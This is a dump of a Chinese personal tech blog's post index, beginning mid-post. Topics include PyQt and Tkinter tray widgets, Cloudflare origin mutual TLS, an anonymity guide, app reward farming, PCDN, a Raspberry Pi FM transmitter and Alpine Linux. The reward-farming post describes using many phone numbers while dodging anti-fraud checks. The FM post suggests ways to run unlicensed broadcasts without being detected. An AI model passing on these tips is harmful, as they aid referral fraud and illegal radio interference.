SystemTrayIcon(QtGui.QIcon(\"pic.ico\"), w)trayIcon.show()Thread(target=some_random_function).start() # 我的脚本函数sys.exit(app.exec_())这样做完之后东西确实可以运行了，不过我的代码还要在其他人的电脑上运行，所以我先用Pyinstaller打包了一下，不过打包出来的程序很大，就几十行代码就算加上Python解析器最多也就不到10MiB，结果这加上PyQt库之后直接上升到40MiB左右，就算用upx压缩完也有30多MiB，实在是让人无法忍受，于是我就考虑看看能不能用其他方式来制作这个图标。   后来我在网上找到有一个叫做pystray的库似乎是专门干这个活的。那既然是专门干这个的那大小肯定比什么Qt库要小得多吧？于是我按照示例的代码随便写了一段：使用pystray库实现from threading import Threadimport pystrayfrom PIL import Imageimage = Image.open(\"pic.png\")icon = pystray.Icon(name=\"SomeRandom\", icon=image, title=\"SomeRandom\", menu=None)Thread(target=some_random_function).start() # 我的脚本函数icon.run()这个代码我没有测试过，不过在我写完之后首先用Pyinstaller打包了一下，结果大小比用PyQt5还要大😂，打包完大小要60多MiB，所以没办法我就只能继续用Qt的那个版本了……制作悬浮图标后来我的脚本由于应用面广泛需要在Ubuntu上使用，最新的Ubuntu使用的GNOME桌面不再支持托盘区了😓，所以没办法，只能想别的办法了。   现在的程序除了托盘区图标证明自己的存在可能还有就是悬浮球了吧？国产很多软件喜欢把自己程序整成悬浮球那样放在桌面上吸引用户的注意力，所以我的程序也要这样搞。我想了想用PyQt库实在是太重了，我想整个轻量的图形引擎，像Python自带的Tkinter就挺不错的，所以我首先用Tkinter做了一个版本出来：通过Tkinter实现import tkinterfrom threading import Threadroot = tkinter.Tk()height = 100width = 100root.overrideredirect(True)root.attributes('-transparentcolor', \"white\")root.attributes(\"-alpha\", 0.9)  # 窗口透明度10 %root.attributes(\"-topmost\", 1)root.geometry(f\"{height}x{width}-40+60\")canvas = tkinter.Canvas(root, height=height, width=width, bg=\"white\")canvas.config(highlightthickness=0)image_file = tkinter.PhotoImage(file=r'pic.png')image = canvas.create_image(    height//2, width//2, anchor=tkinter.CENTER, image=image_file)canvas.pack()x, y = 0, 0show_menu = tkinter.Menu(root, tearoff=0)show_menu.add_command(label=\"SomeRandom\")def move(event):    global x, y    new_x = (event.x-x)+root.winfo_x()-height//2    new_y = (event.y-y)+root.winfo_y()-width//2    s = f\"{height}x{width}+\" + str(new_x)+\"+\" + str(new_y)    root.geometry(s)canvas.bind(\"<B1-Motion>\", move)canvas.bind(\"<Enter>\", lambda event: show_menu.post(event.x_root, event.y_root))canvas.bind(\"<Leave>\", lambda e: show_menu.unpost())Thread(target=some_random_function).start() # 我的脚本函数root.mainloop()这个代码在Windows上工作还算可以，问题不是很多，但是在Linux上就出现了很糟糕的问题，根据tcl/tk documentation 好像也没写🤣 ，“-transparentcolor”属性只能在Windows等系统使用（貌似MacOS也能用？），因此在Linux中会报错。如果不能使用透明背景效果就会很差，我看Stack Overflow上有人说可以安装一个pqiv图片查看器，然后使用os.popen()或者subprocess.Popen()执行pqiv -c -c -i pic.png也能达到类似的效果，不过这种东西先不说还要安装，而且这个东西点两下就能看见它的窗口，还能关闭，那肯定是不符合我们的要求的。所以没办法……只能再考虑Qt的办法了。使用PyQt5库实现我在网上又找了些资料把PyQt的版本也做出来了，而且还加了支持Gif动态图片的效果：import sysfrom PyQt5.QtWidgets import *from PyQt5.QtGui import *from PyQt5.QtCore import *class Example(QWidget):    def __init__(self):        super().__init__()        self.initUI()        def mouseMoveEvent(self, e: QMouseEvent):  # 重写移动事件        if self._tracking:            self._endPos = e.pos() - self._startPos            self.move(self.pos() + self._endPos)     def mousePressEvent(self, e: QMouseEvent):        if e.button() == Qt.LeftButton:            self._startPos = QPoint(e.x(), e.y())            self._tracking = True     def mouseReleaseEvent(self, e: QMouseEvent):        if e.button() == Qt.LeftButton:            self._tracking = False            self._startPos = None            self._endPos = None    def initUI(self):        layout = QStackedLayout()        self.lbl1 = QLabel(self)        self.movie = QMovie(\"pic.gif\")        self.lbl1.setMovie(self.movie)        self.movie.start()        self.lbl1.setToolTip(\"SomeRandom\")        layout.addWidget(self.lbl1)        self.setAttribute(Qt.WA_TranslucentBackground)        self.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.FramelessWindowHint | Qt.Tool)        #layout area for widgets        layout.setCurrentIndex(1)        self.setLayout(layout)        self.setGeometry(QApplication.desktop().width()-130,50,100,100)        self.show()if __name__ == '__main__':    app = QApplication(sys.argv)    Thread(target=some_random_function).start() # 我的脚本函数    ex = Example()    sys.exit(app.exec_())最终做出来效果还不错，说不定加点功能放组简单的立绘动画就能做一个像我博客左下角的看板娘一样的东西呢🤣，虽然我也见过用Electron写的PPet，不过用Python写的话可能对更多人更友好吧 （Gif哪能和Live2D比😂） 。感想这次做这么一个Python程序运行的提示标志还真是复杂啊，尤其是为了跨平台，其实专门对应一个平台做起来可能也没有很复杂，不过想能在各个平台上都能使用还是挺难的。这次来看Qt的跨平台性确实很强，无论是在哪个平台上都能获得不错的体验，就是用起来感觉比较麻烦，其实说来如果能用C++之类的语言去开发Qt程序应该更好，Python这个基本上也就只能当作一个玩具算是熟悉一下Qt的各种功能了。" },{ "title": "如何避免Cloudflare背后的源站被恶意访问", "category": "", "tags": "Cloudflare, CDN, 安全", "url": "/2022/08/15/cdn-verify.html", "date": "2022/08/15", "content": "Cloudflare还是非常完善的，只是我们不会用！起因很久以前我写过一篇文章是介绍关于如何简单的找到Cloudflare背后源站IP的文章。虽然当时的我知道设置了防火墙白名单可以有效的解决这类问题。   不过随着Cloudflare的业务越来越广泛，设置白名单这种方法我感觉已经很不靠谱了。而且最近也遇到一个问题，就是花火学园的用户有些人会使用自动签到的脚本，比如ForumSignin，使用这种脚本破坏了大家公平竞争的原则。虽然我用Cloudflare WAF写了一个很简单的规则解决掉了这个问题，但是万一有人悄悄的绕过了Cloudflare直接访问源站的方式签到那我设置的防火墙就没有一点点用处了。今天正好看到了Cloudflare的双向认证的功能，配置好之后也正好分享一下。关于防火墙白名单的缺陷我们现在已经知道了Cloudflare除了本身CDN的业务外还加了很多花里胡哨的功能，比如Workers，WARP之类的，这些功能有一个特点就是能利用Cloudflare自己的IP来任意发起请求，那防火墙本来就是通过检测访问的IP是不是来自Cloudflare这种方式来判断，那如果能使用这些功能来向我的源站发起请求不就可以绕过WAF了嘛。解决方法以前我的想法是如果Cloudflare能发送一个只有我和Cloudflare知道的请求头那不就可以了嘛，比如Token啥的，但是我没在Cloudflare上发现这个功能。不过今天又没事看了看Cloudflare的功能，发现居然有个叫做“经过身份验证的源服务器拉取”功能，看了看功能解释，原来这是通过双向认证实现的，这配置起来也非常的简单，所以就按照配置文档的说明设置了。   如果看不懂英文，我大概解释一下，首先下载Cloudflare 客户端CA，如果是Apache服务器就直接在配置文件里面写：SSLVerifyClient requireSSLVerifyDepth 1SSLCACertificateFile /path/to/authenticated_origin_pull_ca.pem不过Nginx使用这个功能貌似要crt格式的证书，可以执行openssl x509 -in authenticated_origin_pull_ca.pem -out cloudflare.crt获得crt证书，然后再配置：ssl_client_certificate /etc/nginx/certs/cloudflare.crt;ssl_verify_client on;就可以了。   设置完之后，如果我不开“经过身份验证的源服务器拉取”的功能，就会报“400 Bad Request, No required SSL certificate was sent”的错误，这个效果我非常的满意，这样即使其他人通过比如Workers，WARP之类的功能去请求我的源站IP，也会因为没有Cloudflare的私钥而无法访问，就可以完全避免通过源站IP来绕过WAF这种问题。感想不过这个配置实在是不够显眼，希望Cloudflare能把它放到新手教程里面，让更多人避免因为源站IP泄露导致的安全问题。" },{ "title": "关于在网络中隐私的研究", "category": "", "tags": "网络, 隐私", "url": "/2022/07/16/privacy.html", "date": "2022/07/16", "content": "没有保护隐私的权利，我们也能自己来维护起因前段时间可谓是盒泄漏时代，各个组织和公司都在争着把自己拥有的用户隐私数据往出送，以致于现在在一定程度上可以说没有准备的人默认就是实名上网了 （我也没有准备好😂） 。不过其实如果说做好准备的话除非对方有天大的本事，不然都无法找到在网络中实际操作的人。所以我这次想从原理上来说一说关于隐私的保护方案。保护的前提因为考虑到泄露隐私这种事情实在是太容易了，所以我们一般来说如果想保护的话也很难做到面面俱到，只能针对单独的身份或者行为进行保护，如果真的想保证完全的隐私，那恐怕就不能待在地球上网了。所以尤其是在中国这种地方就更加困难，毕竟实名的东西也很多，关联起来也很简单。隐私泄露的原因与渠道针对向普通访问者泄露的原因一般来说如果只是访问网站的话是很难泄露隐私的，毕竟获取隐私信息的主要方法是通过关键信息关联，比如手机号、邮箱还有IM账号等方便关联实人的联系信息，所以对于其他访问者来说这些信息本来就是不可见的。一般能泄露给访问者的信息基本上只有在网站上进行了写入可以公开信息的东西，比如注册账号、发帖、发消息之类的，当然一般来说普通人之所以开盒也都是因为发送了东西才会引起其他人的注意，不发东西也没有目标啊。   在这种情况下的泄露关联很简单，也很好避免，一般这种就是查发送的信息和公开的个人信息，可能不是所有人都会公开手机号，不过IM账号大多数人都会公开，也许是腾讯的系统并不怎么安全，像QQ号查绑定手机的社工库还挺多的，尤其是用的时间比较长，比较常用的QQ号可以说是100%泄露了手机号。通过手机号查人就更简单了，对于普通人来说什么转账查询、通过快递订单泄露查询什么的可以说是应有尽有，我自己也查过自己，可以说是轻松就能查到，加上我常用的用户名，我只能说其实我在实名上网😭。   当然除了上述普通的社工方案，也有比较高级的技术方案，比如MITM攻击、钓鱼攻击、以及第三方引用泄露等等，不过这些难度还是挺大的，主要还是因为现在加密技术的成熟，可以大大提高这些攻击的难度。针对向网站管理员泄露的原因作为在互联网上访问的人来说，你对目标网站的任何访问网站管理员自然是知道的一清二楚，毕竟你的访问肯定得让网站程序知道吧，不然网站程序怎么给用户返回正确的信息？在这种情况下泄露的信息就更多了，防御的难度也更大了。首先最先泄露的就是IP地址，毕竟在TCP协议中访问一个网站那数据想原路返回也得提前知道访问者的地址啊，就像访问者也能很轻松知道网站的IP地址一样。对于大多数网站管理员来说其实IP地址能获知的隐私信息也不是特别多，最多就是知道你在哪个城市，再精确估计也最多到小区，在IPv4已经被分配完的时代，大多数运营商都用了NAT，所以一个IP下可能包含很多个用户，当然对于运营商的人来说那就不一样了，他们可以根据地址分配的时间以及使用的端口精准的找到访问者的物理位置。顺便一说，如果这个网站允许其他用户使用第三方的图片等资源同样也可以获得访问者的IP。   除了IP之外，还有就是用户自己输入的信息，像对其他访问者不可见的信息对于网站管理员那自然是一览无余的，这个就实在是太简单了，其实说来钓鱼网站也是一样的道理，没有防备的人可能输入的信息就是完全准确的，以致于当网站被攻破时泄露的数据也是准确的。   上述的信息可以说是一些显式的信息，除此之外还有一些隐式的隐私信息，比如访问习惯，访问时间，还有访问的终端信息之类的，虽然这些信息单独拿出来都是没有意义的，但是统一整理出来就能定位到一个人，像很多广告的精准投放就是这个原理。而且这些隐式的隐私信息相比之下就会更加难以去除，相对来说利用也更加困难。针对网络服务提供商泄露的原因作为用户与网站之间的连接者ISP，他们获取隐私信息的方式就相当于是MITM，像以前数据没有加密的时候，那所有信息对于ISP来说都是完全透明的，那也没有什么隐私而言，还好现在成熟的加密技术可以有效的防止他们获取到用户的信息。不过即使是在加密时代，不恰当的处理依然是会泄露自己的信息。首先我们要知道他们会知道什么，虽然访问的内容对于运营商可能是不可知的，但是大多数情况现在人们都不会使用加密的DNS，所以用户访问的网站域名首先就会被泄露。另外即使使用了加密的DNS，很遗憾的是TLS1.2及以前版本有个叫做SNI的特性，这个东西是完全明文的，运营商同样也能根据这个知道你访问的网站。除此之外就是访问的IP了。一般来说现在的统计信息能很轻松知道哪个IP对应于哪个域名，还好有像Cloudflare这种CDN公司，许多网站指向的IP都是相同的，以致于根本没法根据访问的IP来推测用户访问的是哪个网站（当然对于CDN公司本身肯定是知道的一清二楚，包括访问与输入输出的内容也一样），因此运营商现在也几乎没办法仅通过IP来获知用户在访问哪个网站了。对于隐私泄露的解决方法身份伪造首先对于上述问题，我们可以发现大多数的隐私泄露都是用户自己造成的，主要是自己输入的信息。一般来说如果遇到一定需要输入自己信息的一些网站，我们可以提前设定好一个完整的虚拟网络身份，名字和一些住址信息啥的还是比较好整的，不过难整的是联系信息，像中国手机号是实名的，如果用其他国家不实名的手机号运营商还是能通过基站定位到，而其他在中国的很多服务则必须使用手机号登录，这就是所谓的前台匿名，后台实名吧。当然中国服务不能用，我们也可以考虑用国外的，比如Google Voice啥的，不过我也没整过，我也只用过一些公共接码平台。邮箱的话相对倒是好整一些，注册一个邮箱不是什么复杂的事情。银行卡虽然很难整不过大多数网站我们应该不需要用到银行卡，真要付款可以考虑一下数字货币，国外的很多支付平台现在也都支持了。在上述信息准备好后我们在需要用到隐私信息的地方就只需要填自己做好的信息就可以。另外密码最好用密码管理器，所有网站的密码都使用随机字符，保存密码的设备最好用硬件Key，而且方便销毁的那种，以避免钓鱼事件的发生。链路伪造在上述情况我们可以很明显的看出来除了自己泄露的隐私信息，还有很大一部分是由于主动访问导致的，这种情况倒是也有很多解决办法，比较常见的就是使用代理，当然一层代理不行，一层代理实际上对于ISP来说跟没挂差不多，很轻松就能关联起来，要挂至少得两层以上，这样访问时的IP才能和实际上使用的IP脱钩，不然运营商一查目标网站访问IP的访问者，一看流量就知道是谁在访问了。   当然像我们这种没什么钱的人想整多层代理还是比较困难的，毕竟一台服务器不便宜，这时候我们可以用Cloudflare做中间那一层（虽然Cloudflare想追踪也很容易），这样ISP的追踪就很困难了，基本上就只能查到用户正在访问Cloudflare下保护的网站，其他什么也不知道。   如果连服务器都没有也可以用Tor，这个网络就相当于是一个社区维护的多层代理了，通常因为用的人多，所以安全性可能比自己搭的还要好。当然如果有条件的话可以自己的服务器和Tor叠起来用，这样还能避免某些网站歧视Tor出口节点以及可能会遇到蜜罐节点的问题。其实相比之下I2P要更加安全，但是体验……实在是有点拉跨，再怎么隐私我们也得考虑一下体验问题。   另外再希望安全些的话最好买用于当代理的服务器时也挂上Tor，付款的时候使用数字货币，以避免服务器商出卖或者信息泄露的问题。  还有一个很重要的问题就是DNS和SNI，想要解决这个问题，首先DNS也得过代理，不过也行，还有一种叫做DoH的DNS也可以在一定程度上保证安全，至少运营商看不到了，但是DoH的服务商还是能看到，所以还是都过代理比较好。SNI的话主要是现在有些网站它不支持像ESNI或者ECH啥的所以没办法，反正只要出口节点不要关联到自己就行。另外代理最好使用透明代理，而不是系统代理，因为有些软件它不想走代理，比如在使用带有穿透的功能，像直播或者语音电话啥的如果过网站服务器比较费流量，所以为了避免因为这些情况导致的代理失效，使用透明代理是更好的选择。行为伪造这里算是比较复杂的部分了，因为要做到这一点可能成本会更高。为了防止网站管理员获知访问者的行为，我们一般除了上述的操作外还要做一些别的操作，比如需要使用纯净的系统，并且在这个系统上不能够操作任何与现实有关的事情，而且随时都要挂着透明代理，一旦做了不正确的操作一定要及时销毁。据说Subgraph OS就挺好的（最好不要用Windows），有些时候管理员可以通过你不细心的地方发现你的关联性，所以最好用虚拟机或者另外的物理机，我的意见是用树莓派就挺好，系统装TF卡里，有必要的时候把卡直接拔出来一折就销毁掉了，非常的方便，内存用打火机稍微烤一下数据就消失了（危）。   用了上面的方式已经可以避免访问环境造成的隐私泄露了，但还有一个是时间，比如我要发布一个东西，时间一般来说是我按下发布按钮时就会发布，但是这样如果有人从你家窗口看到你按下回车的瞬间文章就出现在了他的屏幕上，那不就很轻松的发现了你与发布的东西的关联性了嘛，所以如果真的要考虑的话时间问题也很重要，比如我想在发送这篇文章的时候不想让别人知道我什么时候发送的，我可以在我的服务器上写一个脚本，当它在某个时间点时在自动commit&push上来，这样大伙就不知道我发送的具体时间了。评论也是差不多的道理，只是操作更复杂一些，有可能会用到浏览器自动化工具，就是操作起来更麻烦一些。总结从上面来看想搞比较完美的隐私还是很困难的，所以全程隐私基本上在地球上不太现实。如果只是希望在发布或查看某些信息时需要隐私就可以用到以上方案了，我们可以编一个身份，拿树莓派安装个自己喜欢的Linux系统去个咖啡厅连上公共WiFi在上面用数字货币挂着Tor在服务器商买个VPS然后用Tor连上去在上面再搭个代理，再用这个Tor+代理去访问网站，用编好的身份注册，看好想发布的位置再用VPS写个脚本选个喜欢的时间通过自动化脚本把想说的话发出去，有必要的时候再随手找个焚烧炉把树莓派丢进去销毁，我们的隐私行动就完满结束啦😂。" },{ "title": "关于字节跳动旗下某些“极速版”软件的探索", "category": "", "tags": "网络, 字节跳动", "url": "/2022/07/03/fast-ver.html", "date": "2022/07/03", "content": "想不到不止是上传可以赚钱……起因由于被家人邀请使用字节跳动旗下某个“极速版”应用，据说这邀请一次可以直接得50CNY左右，看在能拿钱的份上我就下载试了试，倒是还真拿上了，另外正好和我之前整的PCDN做个对比。赚钱的方式使用这类软件赚钱也比较简单，就只要完成软件提出的任务就行，比如我被邀请的那一款就只要打开视频然后挂机就行，经过我一段时间研究，如果刷那种比较长的视频就会很轻松，打开就基本上挂机就行，因为它一个视频只有第一次播放才会计算任务时长。至于其他同类型的软件因为懒得搞而且貌似触发了风控被邀请了也没有收益所以就没试。   做完任务提现倒是也不复杂，只要输入支付宝信息就行，比之前搞的PCDN的网心云好些，那个还要身份证号啥的比较麻烦。不过有个问题就是我用的这个软件虽然每天都能提，但要么是0.3CNY，要么就是15CNY，跨度实在是太大了，除非真的能赚很多钱，不然这种提现方式还是挺折磨人的。 （钱还是早点到手比较安心😂）和PCDN的对比相比之下这种软件的加入门槛低，初期收益高。一般来说PCDN对网络和设备要求都很高，除了网络NAT需要全锥形，硬盘也得比较大，速度也得快；而某些“极速版”软件就只要一个手机就可以用。这种赚钱方式也挺神奇的，作为视频缓存方PCDN（上传方）也能赚到钱，看视频的人（下载方）也能赚到钱，制作视频的人（生产者）也能靠广告签约赚钱，那么到底是谁亏了呢？字节也赚了那么多钱总不是他们亏了吧，但也不存在双赢的情况，那大概是广告商亏了？    不过在这段时间的使用我发现虽然前期收益确实高，相比我费不少功夫整PCDN好不少，但是后期收益就会越来越低，最终低到想把它卸掉，PCDN的收益就相对稳定了，基本上如果一段时间赚这么多，之后也一样是赚这么多。快速利用此类软件赚钱的方式因为这类软件收益会越来越少，所以不需要在此上投入大量的精力，如果手机和手机号很多那效果会更好，因为这类软件没有实名，只需要手机号，那么我只要在每台手机上安装这个软件，相应的用这些手机号登录，然后全部填一个人的邀请码，首先按照平均一号50CNY的收益就会立即到账，为了避免被风控，最好在操作时不要在同一个WiFi下，禁止蓝牙/WiFi或者关闭周围蓝牙设备，关闭定位功能。   之后的一周内每个账户也会有大概几十CNY的收益，也可以全部转到一起，在邀请成功之后就不会有风控了。这个期间可以手动刷，因为确实也费不了很长时间，基本上十几分钟就能搞定任务，也可以用脚本刷，我看GitHub上也有相关的项目，比如autoVideo，不过我也没试过，看起来也好长时间了没更新了，总之原理也很简单，就是隔个几秒模拟向上滑的动作就行了。   超过10天后收益就会达到常规老用户的水平，这时候继续人力刷基本上就不再有意义了，当然有条件的也可以整新的电话号码继续整。如果想搞继续用脚本也可以，就是配置比较麻烦，在我看来如果有条件还是搞PCDN舒服，配好基本上就不用管了，比用脚本刷视频啥的好多了。感想在我看来，这种东西虽然我不会去看视频内容，即使有广告广告商也是白投，不过效果应该还是有的，像我的家人用了这个软件之后还认真看了广告，还买了相应的东西，那这样看来即使有我们这种单纯想薅广告商的钱的人，他们的行为依然是有价值的。   另外我对这种东西不是很感兴趣，PCDN在一定程度上算是一种对网络空间的贡献，所以在我看来是有意义的。但是这种刷视频我是真感觉没啥意义，所以我打算等这个软件收益减少之后就把它卸载掉。" },{ "title": "在宿舍煮粽子的小方案", "category": "", "tags": "粽子", "url": "/2022/05/27/zongzi.html", "date": "2022/05/27", "content": "没有锅想吃粽子怎么办？起因马上就到端午节了，也有点想吃粽子。不过我平时都住在宿舍，没有锅，也没办法持续加热。那我怎么才能吃到粽子呢？调研的经历首先我得买点粽子，我下了单之后过了半天发现它竟然降价了😂，之后还花了不少时间让商家退差价。等粽子到了之后，我想着即使是真空包装，粽子本身应该也是煮熟了才包装的吧，所以刚到我就直接生吃了一个。我以为生吃只是会凉一些，结果吃起来就像土一样😂。第二次我试了试在热水中泡7分钟，泡完之后发现外面一层米已经变黏了，但是里面还是像土一样……不过这么看来，用热水泡肯定是能把真空粽子泡开的，那就只是时间问题了。   我大概搜了一下，小火慢煮粽子大概20分钟就能熟，那我就隔10分钟换一次热水，一共泡20分钟吧。   最终这样做出来效果还不错，粽子的里面和外面都变软了。   不过这次买的粽子是肉粽子，为了更可靠的结果，正好最近公司过节又发了一箱粽子，正好可以做个对比。   之前我是2个咸粽子泡在热水里，每10分钟换一次热水，共20分钟，现在是4个甜粽子也是泡在热水里同样也是20分钟。最终做出来效果同样也很不错，吃起来感觉就像刚煮出来一样。细细品味虽然这泡出来的粽子刚做好的时候看起来和吃起来感觉都和锅里煮出来的一样，但是细细品味的话会感觉米还是有点硬，没有用锅煮出来的效果好。不过能在没法加热的地方能吃到粽子已经很不错了，本来这个办法就是没办法的办法……   之后想想感觉这个方法如果在火车上貌似还挺有用的，在火车上吃粽子感觉要比吃泡面更舒服吧。" },{ "title": "体验成为PCDN的节点", "category": "", "tags": "PCDN, 网络", "url": "/2022/04/17/pcdn.html", "date": "2022/04/17", "content": "用闲置带宽挣钱也许是个不错的选择。起因其实以前我也整过PCDN，比如迅雷的网心云啥的，主要是当时的网络正好是全锥形的，所以才搞了段时间，一个月赚了大概50CNY。不过后来我遇到的网络几乎全部都是对称型网络，所以就再没搞。不过最近又做了些小实验，我所在的网络是移动网，众所周知移动网家宽几乎很难获得公网IP，有时候闲了用NAT类型检测测出来的结果是对称型。因为移动自己也有一层NAT，所以我就没往自己路由器上想，觉得自己路由器应该不会有什么莫名其妙的限制。不过后来我把路由器刷成OpenWRT之后才发现事情好像不对劲。折腾路由器的经历我用的路由器是小米路由器4A百兆版(R4AC)，有一天偶然看到一篇文章是讲关于这个路由器的刷机教程的。一般小米路由器要刷机都要接U盘，但是这个路由器它没有USB接口。不过想不到的是小米路由器的固件有漏洞，有大佬写了一个通用脚本来直接进入小米的系统来刷机。因为小米路由器系统本身也是基于OpenWRT改的，所以操作也和普通的Linux系统一样。   结果我运气还不错，跟着教程搞一次就刷成功了，刷完配置完之后体验了一下，无论从管理面板的速度还是使用时的网速和延迟，感觉都比官方固件快了好多，而且功能也更加强大了，比如能直接在路由器上挂frp，很方便。在体验的过程中我发现了一个选项叫“启用FullCone-NAT”，虽然感觉上层网络应该不支持全锥形吧……总之是试验，就打开了这个选项。打开之后我在电脑上使用NAT类型检测工具试了一下，好家伙，是真的全锥形网络。这时候我又回想起以前搞网心云的经历，打算这次继续搞一搞。用闲置带宽赚钱的经历我在官网上下了网心云的虚拟机之后放到了Hyper-V里，这个我还是挺喜欢的，我不喜欢在电脑上装莫名其妙的国产软件，总感觉他们会在我电脑上留点啥，虚拟机就好多了。不过在配置过程中，虚拟交换机的配置出了些问题，因为作为PCDN的节点，NAT肯定是穿透的越少越好，毕竟用NAT的话实际上穿透的端口是有数量限制的，所以我不应该使用默认的交换机，而是使用桥接到外部网络的交换机。我是用的笔记本连接的网络，所以我一开始计划的是用无线网络作为桥接网络的上层。配置好交换机之后倒是也能用，但问题是我的电脑莫名其妙的出现了特别卡的问题，而且问题主要出现在需要网络的地方，比如打开浏览器会卡，打开设置的网络配置页面会卡，下载文件也会卡。这样可不行，整这个不能影响到我正常使用电脑啊……最终没办法，在包里翻了一会找到了一条网线，接到路由器上然后把虚拟交换机的网络配置到有线网络上之后就好多了。   网心云的系统做的也还不错，系统本身基本上不需要配置，只要填好激活码，配置好网络和硬盘，就基本上没有问题了。现在的话激活码还能免费领取，想当年我的激活码还是花了15CNY买的😂。   目前的话我已经都配置好了，跑了一晚上还不错，赚了0.7CNY，因为是新安装的机器，还没有缓存，之后缓存多起来之后就会好很多了。感想搞PCDN挺不错的，成本的话基本上就只有电费和硬盘损耗，其他的可以不算做成本，毕竟带宽和电脑都是正常支出，如果能搞到不错的网络，整点这种东西也是个不错的选择。" },{ "title": "用树莓派自制FM电台", "category": "", "tags": "树莓派, 电台, FM", "url": "/2022/03/27/radio.html", "date": "2022/03/27", "content": "无线电还挺有意思啊。起因其实我在很早以前就知道树莓派可以当广播电台了，但是我由于我作死的最早开始用的系统是piCore，而且感觉它功能够用就再没换回成官方系统。然而树莓派很多有趣的项目都是基于官方系统而不是不知名的发行版制作的，所以实际上虽然我知道树莓派有能力成为电台但是从来没有试过。然后最近突然想试试看，所以就把Raspberry Pi OS lite又下载回来刷到卡里，想试试看做个电台怎么样。树莓派电台软件的选择一般从网上找教程的话好像推荐直接安装rpitx，不过我看这个项目有段时间没有更新了，虽然功能好像更强大吧……不过我目前就只用的是FM电台的功能，我更希望它的电台功能更强大，所以我又看了看别的项目。我最先看的是fm_transmitter这个项目，根据文档所述的方法安装之后确实能用，不过在整这个项目的时候因为我没有杜邦线传输距离很短，大概信号范围也就1m左右吧。后来我又搜了一下找到了PiFmAdv这个项目，它看起来是基于PiFmRds项目改编升级的，功能多了很多，但是我不知道这个作者是怎么想的，原来的项目还支持ARM64(aarch64)，结果改完之后反倒不支持了😓，最开始我怎么编译都不通过，后来看了一眼Makefile发现不太对劲，然后我就简单改了一下参数总算可以编译通过了。这一点我已经提了issue，不知道作者会不会改，如果不会改的话大家要是想在64位的树莓派系统上运行需要注意改一下Makefile。PiFmAdv的体验用了一下PiFmAdv之后发现这个清晰度真的和项目描述一样音质比fm_transmitter好了很多，也没有杂音了。后来我又看了看文档，发现它最多支持同时通过3个GPIO接口发射信号，于是我试了试用以下命令启动：sox audio.mp3 -t wav - repeat - | sudo ./pi_fm_adv --audio - --freq 108.0 --power 7 --gpio 4 --gpio 20 --gpio 32 --rds 0信号也真的好了很多。这下一下就让我起了兴趣，于是就去淘宝上买了点杜邦线回来当天线。按照说明来看，这个程序只能在GPIO的4、20和32号口输出信号，貌似是用到了GPCLK的功能，所以只能用这些针脚。4号和20号口很容易找，具体位置可以看下面我打”x”的位置：,--------------------------------.| ooooooooooooooooooxo J8     +====| 1ooxoooooooooooooooo        | USB|                             +====|      Pi Model 3B  V1.2         ||      +----+                 +====| |D|  |SoC |                 | USB| |S|  |    |                 +====| |I|  +----+                    ||                   |C|     +======|                   |S|     |   Net| pwr        |HDMI| |I||A|  +======`-| |--------|    |----|V|-------'但是32号口我是怎么找都没找到，在网上各种查资料都没有找到32号GPIO口……可能它是走的板子内的某根线吧……   具体要接多长的天线呢？我看一般人推荐就接一节杜邦线就行了（大概10cm），当然这我肯定不会满足，我查了一下相关原理，好像说4号口理论上接1.5m长的天线可以最大化利用它的能力，所以我就直接买的公对母的线，接了2条大概1.4m的线，接到了4号和20号口，打开一试，信号真的一下就扩展到了将近1km的样子，我用手机的收音机功能测试在只有1道墙隔开的情况基本上1km没有任何问题，如果隔得墙多了大概只能到50m左右。不过这个发射信号的能力倒是比WiFi强了不少，估计是因为频率比较低吧。   这个程序不仅支持发射音频信号，还能发射RDS数据，不过很遗憾我没有接收RDS数据的设备，所以我也测不了……可能的风险与危害首先，个人发射无线电波在很多国家都是违法的，我搜了一下大多数国家在电台频段个人发射的功率限制基本上连1mW都不到，树莓派一个针脚最大发射电流是16mA，和电压3.3V相乘就要接近50mW了，所以要想玩的话要么就不要接天线，或者说不要接太长的天线，或者不要开时间太长，免得被别人搜到，还有就是不要占用有信号的频道，一是自己听着也乱，二是这样如果有人在用更容易被发现。另外不推荐设置超过87-108Mhz的频率，一是这样中国的收音机也接收不到，二是再往上就要到航空用频道，再往下就可能到军用频道的，那些频道占用的话还是挺危险的，所以一般给无线电爱好者分的频段好像都在300-400Mhz的样子，当然这样那就不是FM电台了，在那个频段的好像都是对讲机啥的。所以最终还是推荐别开时间太长，而且不推荐播小广告啥的，放音乐一般好像没人管，播广告那就是妥妥的“黑广播”了。   另外还有可能的危害比如说假如有人在飞机上在航空频段开广播，这个程序可是没有限制频率的，那可能真的可以让飞机驾驶舱播广播，这可就不是小问题了。严重的可能飞行员就只能迫降了，毕竟要是听不清塔台的信号那还是有大问题的。来点阴谋论综上所述，我觉得从权力机构的层面可能因此有限制无线电知识的情况。其实普通人想发射无线电是非常容易的事情，有电流通过的地方就有电磁波，这么说来那我觉得不只是树莓派这种连接虚拟与现实的设备能做得到发射无线电，但凡是有导线，能改变通电状态的设备理论上应该都可以。那我是不是用扬声器，USB线等能传输信号的设备都可以发射？这让我想起了Fabrice Bellard大神写的一个用VGA显卡来发射DVB-T信号的程序，那个程序应该说是非常厉害了，我觉得理论上我用扬声器发射FM信号这种事情应该是能做到的，就是不知道声卡能不能不解码直接向扬声器发射电流，另外还有个好处就是树莓派实际上是用PMW模拟的FM信号，而扬声器是可以调整电流大小的，理论上实现可能更简单吧……其实要是说呢以前的手机是支持当作FM电台的，现在就都不支持了，所以我觉得说不定不是大家做不出来这样的程序，而是做出来的人都消失了😂。希望能有大佬给点力吧，能把这种软件多开源点出来。感想感觉无线电还挺有意思的，要不然回头学一学考个业余电台操作证书？我之前还看过一位大佬用卫星和世界各地的人通信，感觉真的非常厉害。不过在这里面有好多法律的限制还挺麻烦的……可能也就只能自己玩玩了吧。" },{ "title": "Alpine的使用体验", "category": "", "tags": "Alpine, LEMP, PHP", "url": "/2022/03/12/alpine.html", "date": "2022/03/12", "content": "没别的，小就是好！起因最近一段时间，我开始学习Docker了。在学习期间，我知道了Docker官方推荐的Alpine Linux系统。以前我也听说过这个系统，但是名字没什么特色就没关心过。不过既然学了Docker，我也体验了一下，发现还真是相当不错，而且正好能解决我手头的问题。Alpine的特点Alpine Linux和我之前用过的piCore在PC上用的版本TinyCore 